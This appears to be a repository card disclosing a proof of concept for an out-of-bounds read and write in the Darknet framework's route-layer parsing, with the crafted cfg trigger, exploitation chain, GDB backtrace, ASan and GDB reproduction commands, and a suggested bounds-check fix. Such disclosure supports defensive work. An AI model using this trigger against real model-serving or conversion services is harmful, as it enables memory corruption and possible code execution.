You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

PoC: pjreddie/darknet β€” parse_route() OOB Read β†’ forward_route_layer OOB Write (CWE-129 β†’ CWE-787)

Vulnerability

pjreddie/darknet is the original Darknet neural network framework. Its parse_route() function in src/parser.c reads layer indices from .cfg files via atoi() and uses them to index net->layers[index] without checking index >= 0 && index < net->n.

This OOB read value then propagates through the network construction and into the forward pass, where forward_route_layer() calls copy_cpu() with the garbage value as the copy count β€” resulting in a massive heap/stack out-of-bounds write.

Exploitation Chain (proven via GDB)

1. Malicious .cfg: [route] layers=0,5  (index 5 > net->n which is 3)
2. parse_route():    net->layers[5].outputs β†’ OOB READ β†’ garbage (e.g. 1,057,326,470)
3. make_route_layer(): xcalloc(garbage_outputs * batch, sizeof(float)) β†’ corrupted alloc
4. forward_route_layer(): copy_cpu(N=garbage, X=corrupt_ptr, Y=output_buf)
5. copy_cpu (blas.c:378): for(i=0;i<N;++i) Y[i*INCY] = X[i*INCX] β†’ ~1 billion OOB WRITES

GDB Backtrace (proof of write path)

#0  copy_cpu (N=1057326470, X=0x3f8000003f800000, Y=0x7ffdff52a010) at blas.c:378
#1  forward_route_layer at route_layer.c:91
#2  forward_network at network.c:280
#3  network_predict at network.c:774
#4  test_yolo at yolo.c:320

Impact

  • Heap/stack out-of-bounds WRITE with attacker-influenced data (X pointer comes from OOB layer data)
  • Potential RIP control via heap metadata corruption or function pointer overwrite
  • Affects any service that parses user-supplied darknet .cfg files (model serving, conversion tools, CI pipelines)

Reproduction

Phase 1: ASan proves OOB read at parse_route

git clone https://github.com/pjreddie/darknet.git
cd darknet
sed -i 's/^CFLAGS=.*/CFLAGS=-fsanitize=address -g -O0 -Wall -Wno-unused-result -Wno-unknown-pragmas -Wfatal-errors -fPIC/' Makefile
make -j$(nproc)
./darknet yolo test poc_malicious.cfg

Expected: ERROR: AddressSanitizer: heap-buffer-overflow src/parser.c:1087 in parse_route

Phase 2: GDB proves write path at copy_cpu

# Rebuild without ASan so OOB read succeeds and reaches forward pass
sed -i 's/^CFLAGS=.*/CFLAGS=-g -O0 -Wall -Wno-unused-result -Wno-unknown-pragmas -fPIC/' Makefile
make clean && make -j$(nproc)
echo -e "test.ppm\n" | gdb -batch -ex "run yolo test poc_malicious.cfg" -ex "bt 5" -ex "info args" ./darknet

Expected: SIGSEGV in copy_cpu at blas.c:378 with N=1057326470

Or run the automated script:

chmod +x reproduce_ace.sh
./reproduce_ace.sh

Files

  • poc_malicious.cfg β€” crafted config with layers=0,5 (index 5 out of bounds)
  • poc_ace_chain.cfg β€” variant with layers=0,100000 (larger OOB)
  • reproduce_ace.sh β€” automated reproduction (ASan + GDB phases)
  • reproduce.sh β€” basic ASan-only reproduction
  • parser.c β€” real source from pjreddie/darknet showing vulnerable code at line 1087

Related

  • CVE-2026-7482 "Bleeding Llama" (CVSS 9.1) β€” same class: unchecked file-supplied index/size in model loader

Suggested Fix

// parser.c, after line 617:
if(index < 0 || index >= net->n) {
    fprintf(stderr, "route layer index %d out of range (net has %d layers)\n", index, net->n);
    exit(1);
}
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support